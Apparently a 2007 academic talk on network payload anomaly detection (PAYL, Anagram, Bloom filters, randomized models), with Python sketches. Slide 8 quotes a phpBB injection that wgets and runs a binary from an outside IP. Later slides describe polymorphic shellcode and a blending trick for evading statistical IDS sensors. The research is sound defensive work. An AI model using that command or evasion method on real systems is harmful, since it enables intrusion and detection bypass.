Title: Content-based Anomaly Detection
1. Content-based Anomaly Detection
- Salvatore J. Stolfo
- Columbia University
- Department of Computer Science
- IDS Lab
December 2007
2. Collaborators
- Gabriela Cretu
- Angelos Keromytis
- Mike Locasto
- Janak Parekh
- Angelos Stavrou
- Yingbo Song
- Ke Wang
3. Agenda
- Anagram payload anomaly detection algorithm (post-PAYL)
- The polymorphic threat
- Countering adversarial training/mimicry attacks
- Randomized modeling/testing
4. Conjecture and Goal
- Detect zero-day exploits via content analysis
- Worm propagation is detectable via flow statistics (except perhaps slow worms)
- Targeted attacks (sophisticated, stealthy, no loud and obvious propagation/behavior)
- A true zero-day will manifest as never-before-seen data
- Learn typical/normal data, detect abnormal data
- Desiderata: accuracy, efficiency, scale, counter-evasion (resist training and mimicry attacks)
- Minimize false negatives
- Minimize resource consumption too (think MANETs)
5. Goal
- We seek to model normal payload
  - Ingress from external sources to servers
  - Egress from servers to external sources
  - Egress from clients within a LAN
- We model content flows that are cleartext
- Learn typical/normal data to detect abnormal data; the model need not be perfect
  - Whitelisted data deemed normal passes
  - Blacklisted data is filtered
  - Suspicious data deemed abnormal is subjected to deeper analysis, e.g., emulation
- Overall goal for the system: don't negatively impact operations
  - Maintain throughput, minimize latency, minimize cost
6. (No transcript)
7. Previous work: PAYL
- Models the length-conditioned character frequency distribution (1-grams) of normal traffic
- Testing: Mahalanobis distance of the test packet against the model (see the sketch below)
- Pro:
  - Simple, fast, memory-efficient
- Con:
  - Cannot capture attacks displaying a normal byte distribution
  - Easily fooled by mimicry attacks with proper padding
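Below is a minimal Python sketch of the PAYL idea for a single payload-length bin: learn the mean and standard deviation of each byte value's relative frequency, then score a test packet with the simplified Mahalanobis distance. The smoothing constant ALPHA is an assumed value, not one from the talk.

import numpy as np

ALPHA = 0.001  # smoothing constant to avoid division by zero (assumed value)

def byte_freq(payload: bytes) -> np.ndarray:
    # Relative frequency of each of the 256 byte values (the 1-gram features).
    counts = np.bincount(np.frombuffer(payload, dtype=np.uint8), minlength=256)
    return counts / max(len(payload), 1)

def train(payloads):
    # Per-byte mean and standard deviation over normal training payloads.
    freqs = np.stack([byte_freq(p) for p in payloads])
    return freqs.mean(axis=0), freqs.std(axis=0)

def score(payload: bytes, mean: np.ndarray, std: np.ndarray) -> float:
    # Simplified Mahalanobis distance: sum of per-byte deviations scaled by std.
    return float((np.abs(byte_freq(payload) - mean) / (std + ALPHA)).sum())

Packets whose score exceeds a calibrated threshold are flagged as anomalous.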
8. Example: phpBB forum attack

GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/1.1.Host:.128.59.16.26.User-Agent:.Mozilla/4.0.(compatible;.MSIE.6.0;.Windows.NT.5.1)..
- Relatively normal byte distribution, so PAYL misses it
- What we need: capture the order dependence of byte sequences
- For PAYL, frequency-based modeling of n-grams (n > 1) is infeasible here, since the feature space is huge, requiring long training time
- Anagram: modeling higher-order n-grams (n > 1) is possible
9. Why n-grams?
- Easily extracted features from packet payload flows
- Language/protocol independent
10. Overview of Anagram
- Binary-based high-order n-gram modeling
- Store all the distinct n-grams appearing in the normal training data
- During testing, compute the percentage of never-seen distinct n-grams out of the total n-grams in a packet (see the sketch below)
- Semi-supervised:
  - Normal traffic is modeled
  - Previously known malicious traffic is modeled: Snort rules, captured malcode
- The model is space-efficient, using Bloom filters with gzip
  - Normal 7-gram BF: 16 MB -> 1.2 MB after gzip
  - Malicious mixed 2-9-gram BF: 8 MB -> 0.8 MB after gzip
- Accurate anomalous payload detection, even for carefully crafted attacks/mimicry attacks
- Fast correlation of multiple alerts, while preserving privacy, using a Bloom filter representation of anomalous payload
- Generates robust attack signatures
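A minimal sketch of Anagram-style training and scoring, using a plain Python set in place of the Bloom filter for clarity; the gram size N and the use of a set are illustrative assumptions.

N = 5  # n-gram size (assumed; the talk evaluates several sizes)

def ngrams(payload: bytes, n: int = N):
    return (payload[i:i + n] for i in range(len(payload) - n + 1))

def train(normal_payloads, n: int = N):
    model = set()  # stands in for the Bloom filter
    for p in normal_payloads:
        model.update(ngrams(p, n))
    return model

def score(payload: bytes, model, n: int = N) -> float:
    grams = list(ngrams(payload, n))
    if not grams:
        return 0.0
    unseen = sum(1 for g in grams if g not in model)
    return unseen / len(grams)  # fraction of never-seen n-grams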
11. Bloom filter
- A Bloom filter (BF) is a one-way data structure that supports insert and verify operations, yet is fast and space-efficient
- Represented as a bit vector: bit b is set if h_i(e) = b, where h_i is a hash function and e is the element in question
- No false negatives, although false positives are possible in a saturated BF via hash collisions; use multiple hash functions for robustness
- Each n-gram is a candidate element to be inserted or verified in the BF (see the sketch below)
- Bloom filters are also privacy-preserving, since n-grams cannot be extracted from the resulting bit vector
  - An exhaustive dictionary attack may reveal grams
  - Frequencies of grams are not available, so reconstruction is very hard
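A minimal Bloom filter sketch in Python; the bit-vector size and hash count are illustrative assumptions, not the parameters used in the talk.

import hashlib

class BloomFilter:
    def __init__(self, m_bits: int = 2**20, k: int = 3):
        self.m = m_bits            # size of the bit vector
        self.k = k                 # number of hash functions
        self.bits = bytearray(m_bits // 8)

    def _positions(self, item: bytes):
        # Derive k bit positions from salted SHA-1 digests.
        for i in range(self.k):
            h = hashlib.sha1(bytes([i]) + item).digest()
            yield int.from_bytes(h[:8], "big") % self.m

    def insert(self, item: bytes):
        for pos in self._positions(item):
            self.bits[pos // 8] |= 1 << (pos % 8)

    def verify(self, item: bytes) -> bool:
        # True may be a false positive; False is never wrong (no false negatives).
        return all(self.bits[pos // 8] >> (pos % 8) & 1 for pos in self._positions(item))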
12. (No transcript)
13. Overview of Anagram (training: BF models)
14. Overview of Anagram (detection: a BF represents anomalous packet data)
15. False positive rate (with 100% detection rate) for different training times and n-gram sizes
Normal traffic: real web traffic collected from two CUCS web servers. Test worms: CR, CRII, WebDAV, Mirela, the phpBB forum attack, and the nsiislog.dll buffer overflow (MS03-022).
- Low false positive rate PER PACKET (better per flow)
- No significant gain after 4 days of training
- Higher-order n-grams need longer training time to build a good model
- 3-grams are not long enough to distinguish malicious byte sequences from normal ones
16. Anagram: semi-supervised learning
- The binary-based approach is simple and efficient, but too sensitive to noisy data
- Avoid high-entropy fields
- Pre-compute a "bad content" model to discriminate, using Snort rules and a collection of worm samples
- This model should match few normal packets, while being able to identify malicious traffic (often, new exploits reuse portions of old exploits)
- The model contains the distinct n-grams appearing in malcode collections that do not also appear in normal traffic
- Use a small, clean dataset to exclude the normal n-grams appearing in the Snort rules and viruses
17. Use of the bad content model
- Training: ignore possibly malicious n-grams
  - Packets with too many n-grams matching the bad content model are ignored
  - Packets with a high matching score (>5%) are ignored, since new attacks might reuse old exploit code
  - Ignoring a few packets is harmless for training
- Testing: scoring separates malicious from normal
  - If a never-seen n-gram also appears in the bad content model, give it a higher weight factor t (t = 5 in our experiments; a weighted-scoring sketch follows)
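A sketch of the weighted test score described above, with the bad content model consulted for every never-seen n-gram; the set-based models are stand-ins for the Bloom filters.

T = 5  # weight factor t from the experiment above

def weighted_score(payload: bytes, normal_model, bad_model, n: int = 5, t: int = T) -> float:
    grams = [payload[i:i + n] for i in range(len(payload) - n + 1)]
    if not grams:
        return 0.0
    total = 0.0
    for g in grams:
        if g not in normal_model:
            # Never-seen n-grams that also look malicious count t times as much.
            total += t if g in bad_model else 1
    return total / len(grams)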
18. The false positive rate (with 100% detection rate) for different n-gram sizes, under both normal and semi-supervised training (per-packet rate)
19. Yesterday's News, literally!
20. Can we get ahead of the enemy?
- Polymorphism complicates everything and challenges assumptions
- So, how well do current engines do?
  - Metrics to evaluate
  - Spectral imaging to visualize
- Can we pre-compute malcode before the enemy does, and pre-model variants yet to be seen in the wild?
  - GA search to generate decoders
21. Analysis of the Polymorphic Threat
- Goals:
  - Analyze the effectiveness of current polymorphism techniques employed by shellcoders to evade signature-based IDS
  - Develop metrics to quantify the strength of modern polymorphic engines, and use them to analyze existing engines in the wild
  - Explore the threat of combining polymorphism with other evasion techniques, such as blending attacks
  - Explore the theoretical limits of shellcode polymorphism
22. Why use Polymorphism?
- An easy-to-use obfuscation technique to complicate detection
- Basic shellcode form: [NOP][PAYLOAD][RETADDR]
- Basic cipher-based polymorphism:
  - 1. Cipher/encode the payload
  - 2. Prepend a decoder in front
  - 3. The shellcode decrypts itself as it executes!
- Now only the decoder needs to be polymorphic
- Polymorphic shellcode: [NOP][DECODER][CIPHER_TEXT][RETADDR]
23. Polymorphic Shellcode
- Sample decoder from the open-source CLET engine
- Only 35 bytes are needed to generate five layers of cipher operations
How can we measure the effectiveness of these polymorphic techniques? Modeling the encrypted portion is impossible; we need a metric to measure decoder variants.
24. Strength Metrics for Polymorphism
- Variation strength estimates the spread over n-space (the average of the square roots of the covariance-matrix eigenvalues that span the generated space of decoders)
- Propagation strength estimates how different each decoder appears (it measures the expected distance between any two decoders)
- Overall strength is the product of the two metrics. Some engines generate many decoders by shifting the order of operations; in that case variation strength might be high, but propagation strength would be low. (A sketch of both metrics follows.)
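A Python sketch of the two metrics as defined above; this is our reading of the definitions, not the authors' exact estimator, and the pair-sampling bound is an assumption for tractability.

import numpy as np
from itertools import combinations, islice

def variation_strength(decoders: np.ndarray) -> float:
    # Average of the square roots of the covariance-matrix eigenvalues,
    # i.e., the mean spread along the principal axes of the decoder space.
    cov = np.cov(decoders.astype(float), rowvar=False)
    eig = np.clip(np.linalg.eigvalsh(cov), 0.0, None)  # guard tiny negative values
    return float(np.sqrt(eig).mean())

def propagation_strength(decoders: np.ndarray, max_pairs: int = 1000) -> float:
    # Expected distance between any two decoders, estimated over sampled pairs.
    pairs = islice(combinations(range(len(decoders)), 2), max_pairs)
    dists = [np.linalg.norm(decoders[i].astype(float) - decoders[j].astype(float))
             for i, j in pairs]
    return float(np.mean(dists))

def overall_strength(decoders: np.ndarray) -> float:
    # decoders: samples-by-n matrix, one fixed-length decoder per row.
    return variation_strength(decoders) * propagation_strength(decoders)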
25. Strength Metrics
- To evaluate the strength of a polymorphic engine, we take a shellcode sample, use it to generate 50,000 decoders, extract the decoders, and then apply the metrics we presented.
Decoder polymorphism strengths for various engines using our metric; we also present the scores for random strings with range 128 and range 256.
26. Strength Metrics
- Another innovation: spectral images.
- Generate decoder samples, stack them together, and display the stacked samples as an image; the invariants appear as stripes (see the sketch below).
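A short sketch of how such a spectral image can be produced; the file name and color map are arbitrary choices.

import numpy as np
import matplotlib.pyplot as plt

def spectral_image(decoders, out_path: str = "spectral.png"):
    # One decoder per row of pixels; byte positions that never vary across
    # samples appear as vertical stripes (the engine's invariants).
    img = np.array([list(d) for d in decoders], dtype=np.uint8)
    plt.imshow(img, cmap="gray", aspect="auto", interpolation="nearest")
    plt.xlabel("byte position")
    plt.ylabel("decoder sample")
    plt.savefig(out_path)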
27. Exemplar Polymorphic Blending Engine
We combine CLET and ADMmutate, and add our own blending engine. CLET ciphers the shellcode and leaves a blending section open; execution doesn't reach there.
- ADMmutate hides CLET's NOP sled
- The decoder and exploit section is randomized
- The return-address section is obfuscated, with blending aimed at some target distribution
Each row of pixels represents a fully working shellcode: [nop][decoder][cipher-text][open-blend][retaddr]
28. Polymorphic Blending Potential
- The blending section sits outside the shellcode's inner loop and is never reached during execution. Attackers can fill this area with bytes sampled from the same distribution as the target network to bypass statistical IDS sensors (a sampling sketch follows).
- The byte distribution of a sample target network.
- Mahalanobis distance from the shellcode byte distribution to the target distribution as we enlarge the blending section.
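A sketch of the blending step itself, as we read it from the slide: fill the unreachable section with bytes drawn from the target network's empirical 1-gram distribution, pulling the packet's statistics toward normal.

import numpy as np

def blend_section(target_dist: np.ndarray, length: int, rng=None) -> bytes:
    # target_dist: 256 relative byte frequencies estimated from target traffic.
    rng = rng or np.random.default_rng()
    draws = rng.choice(256, size=length, p=target_dist / target_dist.sum())
    return draws.astype(np.uint8).tobytes()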
29. Is N-space Saturated?
- Theoretical limits of polymorphism?
- GA search shows n-space is likely saturated with x86 code that behaves like polymorphic decoders.
- The magnitude of the decoder space is 256^n, roughly 10^72 where n is the length of the decoder (30 bytes); the number of atoms in the universe is only about 10^80.
30. Conclusion on Polymorphism
- The metrics provide a means to quantify the strength of polymorphic engines relative to each other
- Very sophisticated polymorphism techniques are already implemented and are a real threat
- Experimental results show that there is virtually no limit to the ways decoders can be written
- Signature-based methods aren't likely to work in the long term
- The only hope?
  - Either instrument ALL systems with dynamic host-based tests,
  - or counter these evasion techniques with a better content AD sensor
- We do not yet know whether another modeling technique can effectively discriminate well enough between malicious and benign content
31. Counter Evasion
- Blind the attacker to critical information using randomization techniques
- We assume attackers know the algorithm, and can perhaps estimate the target distribution over some period of time, but they may not know the actual model used by a content AD sensor!
- The enemy needs to know:
  - Where to pad
    - Hide the packet locations where models are tested
  - What to pad
    - Hide the normal distribution
    - Length-conditioned models, e.g., multiple Bloom filters per model
    - Hide the gram size: random choice of n
  - When to pad
    - Re-compute models on a random schedule, e.g., time-bounded Bloom filter models
32. Randomization against mimicry attacks
- The general idea of payload-based mimicry attacks is to craft small pieces of exploit code with a large amount of normal padding, making the whole packet look normal with respect to some particular model
- If we randomly choose the payload portions used for modeling/testing, the attacker cannot know precisely which byte positions to pad to appear normal: it becomes harder to hide the exploit code!
- This is a general technique that can be used for both PAYL and Anagram, or any other payload anomaly detector
- For Anagram, additional randomization: keep the n-gram size a secret!
33. Randomized Modeling (1)
- Separate the whole packet/session randomly into several (possibly interleaved) substrings or subsequences S1, S2, ..., SN, and build one model for each of these randomly chosen portions
- The test payload is divided accordingly
34. Randomization techniques (2)
- Randomized testing: a simpler strategy that does not incur substantial overhead
- Build one model for the whole packet, and randomize the tested portions
- Separate the whole packet randomly into several (possibly interleaved) partitions S1, S2, ..., SN
- Score each randomly chosen partition separately (see the sketch below)
35. (No transcript)
36. Randomization techniques (3)
- Fine-grained modeling of normal payload
- Condition models on packet length or on randomly chosen packet portions
- Could incur large memory costs
- Cluster adjacent models to reduce the detector's space
37. Example of clustering models
38. Feedback-based learning with shadow servers (correlation with server responses)
- Training attacks: an attacker sends malicious data during training time to poison the model
- The bad content model cannot guarantee 100% detection
- The most reliable approach is to use the feedback of a host-based shadow server to supervise the training
- Also useful for adaptive learning, to accommodate concept drift
- Anagram can be used as a first-line classifier to amortize the expensive cost of the shadow server
- Only a small percentage of all traffic is sent to the shadow server, instead of all of it
- The feedback of the shadow server can improve the accuracy of Anagram
39. (No transcript)
40. Minimize Latency
False positive rate is not the only metric: sensor speed is crucial for all traffic, and accuracy impacts latency. A protected system with a shadow server incurs latency: true positives are filtered, true negatives incur no latency, and false positives incur some latency.
Let L = operational latency per request, O = shadow server overhead (e.g., 20%), and F = false positive rate of the sensor. Then L' = ((1-F) · L) + (F · L · (1+O)) = L · (1 + O·F). Target: L' ≈ L. With O = 20%, F can be as high as 10% while adding only 2% average latency. (A numeric check follows.)
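A quick numeric check of the latency model, using our reconstruction of the slide's formula:

L = 1.0   # baseline operational latency per request (normalized)
O = 0.20  # shadow server overhead, 20%
F = 0.10  # sensor false positive rate, 10%

# Average latency: true negatives cost L; false positives also pass through
# the shadow server, costing L * (1 + O).
L_prime = (1 - F) * L + F * L * (1 + O)
print(L_prime)  # 1.02 -> only 2% added latency on average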
41. Thank you!
42. With the huge feature space of high-order n-grams, when is the model well trained? How likely are we to see new normal n-grams?
The likelihood of seeing new n-grams, i.e., the percentage of new distinct n-grams out of every 10,000 packets, as we train on up to 500 hours of traffic data.
43. Distribution of bad-content matching scores for normal packets (left) and attack packets (right). The matching score is the percentage of a packet's n-grams that match the bad content model.
44. Cross-site collaboration: content alert sharing
- Principles:
  - Each site has a distinct content flow
  - Diversity via content (not system or software)
  - A higher standard to confound mimicry attacks: exploit writers/attackers have to learn the distinct content traffic patterns of many different sites
- If multiple sites see the same or similar content alerts, it is highly likely to be a true worm or targeted outbreak
- Each site corroborates its evidence
- Reduces false positives by creating whitelists of those alerts that cannot be correlated
45. Anagram: privacy-preserving cross-site collaboration
- The anomalous n-grams of a suspicious payload are stored in a Bloom filter and exchanged among sites
- By checking the n-grams of local alerts against the Bloom filter alert, it is easy to tell how similar the alerts are to each other (see the sketch below)
- The common malicious n-grams can be used for general signature generation, even for polymorphic worms
- Privacy-preserving, with no loss of accuracy
46. Counter Evasion: Collaborative Sharing of Suspicious Content (DNAD-2/AEOLOS). PI: Sal Stolfo, Columbia University. Tel. (212) 939-7080, E-Mail: sal@cs.columbia.edu
- Objective:
  - Validate suspect anomalous content detected locally as a true new attack exploit
  - Identify anomalous content indicative of attack, botnet command and control, or malware embedded in docs
  - Resist mimicry and training attacks
  - Cross-site validation to detect true positives
  - Preserve privacy of shared data among sites
- Contract: Army Research Office, No. DA W911NF-04-1-0442. Budget: FY05-07 NSA MIPR/ARO 420K
- Continuous, semi-supervised learning of new attack exploits; cross-site validation
- Accomplishments:
  - Developed the new Anagram sensor, shown to resist mimicry attack
  - Developed new quantifiable privacy-preservation techniques for cross-domain sharing
  - Collaborating with NSA and other organizations to test
- Challenges:
  - Cross-site collaborators and managing privacy policies
  - Develop interchange and interfaces for content submission
- Scientific/Technical Approach:
  - Anagram anomaly detector based upon randomized models, countering mimicry attacks
  - Use a privacy-preserving, one-way Bloom filter data structure to share anomalous content among sites, and correlate to filter out false positives
  - Robust signatures extracted from Bloom filters
47. DNAD
- Goal: develop a new paradigm for intrusion alert information sharing while maintaining compliance with information disclosure restrictions and privacy policies
- Support rich, varied types of intrusion alerts and models/profiles of behavior
- Critical to get an accurate global view of threats rapidly, to enable defense mechanisms
- IRB/legal roadblocks prevented wide-scale deployment
48. DNAD corroboration model
- Transmit privacy-preserving transforms of IDS alerts; extend beyond headers to network traffic payloads and other models
- Build a robust, temporally aware corroboration infrastructure able to match alerts (and fragments of alerts) across sites
- Use compact Bloom filters and n-gram analysis for fast, robust encoding
- Automatic suspect signature generation
49. A graphical view: think P2P
50. What if we exchange models too?
51. Training data sanitization
- Motivation:
  - Focus on zero-day attacks, but:
  - Anomaly detection performance can be improved by using clean training data
  - Attacks appearing in training data can deteriorate detection performance
  - False positives create excessive noise
- Method (a voting sketch follows):
  - Use a large set of (distributed and diverse) training data of network packet payloads from multiple domains
  - Divide the data into multiple blocks
  - Build a model for each block and exchange the models (privacy preservation)
  - Test all models against a smaller local dataset
  - Use voting algorithms (bagging predictors) to separate false positives from true positives
  - Clean the data based on the previous step
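A sketch of the voting step, assuming an abstract score_fn(packet, model) and a calibrated threshold; the vote fraction is an illustrative parameter.

def sanitize(local_packets, block_models, score_fn, threshold, vote_frac=0.5):
    clean, suspicious = [], []
    for pkt in local_packets:
        # Each block model votes on whether the packet looks anomalous.
        votes = sum(1 for m in block_models if score_fn(pkt, m) > threshold)
        if votes / len(block_models) >= vote_frac:
            suspicious.append(pkt)   # corroborated by many models: likely a true attack
        else:
            clean.append(pkt)        # keep for the sanitized training set
    return clean, suspicious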